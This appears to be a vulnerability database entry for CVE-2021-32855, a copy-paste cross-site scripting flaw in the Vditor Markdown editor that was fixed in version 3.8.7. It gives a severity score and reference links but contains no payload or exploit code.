CVE-2021-32855

vditor vulnerable to Cross-site Scripting

CVSS 6.1 MEDIUMEPSS 0.6%CWE-79

In short

Vditor, a Markdown editor, has a security flaw where malicious code can be executed if someone tricks you into copying and pasting it into the editor. This could allow attackers to steal your data or take control of your session.

Technical detail

Vditor prior to version 3.8.7 is vulnerable to stored/paste-based XSS where unsanitized content from clipboard operations is rendered without proper validation. The attack requires social engineering to convince the user to copy malicious payload into the editor, resulting in arbitrary JavaScript execution in the victim's browser context.

Summary generated and translated by AI from the official description.

Vditor is a browser-side Markdown editor. Versions prior to 3.8.7 are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. Version 3.8.7 contains a patch for this issue.

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Affected products

npm · vditor

Want to know if your infrastructure is exposed to this?

Talk to TrueHacking →

References

https://github.com/Vanessa219/vditor/commit/1b2382d7f8a4ee509d9245db4450d926a0b24146 https://github.com/Vanessa219/vditor/issues/1085 https://securitylab.github.com/advisories/GHSL-2021-1006-vditor/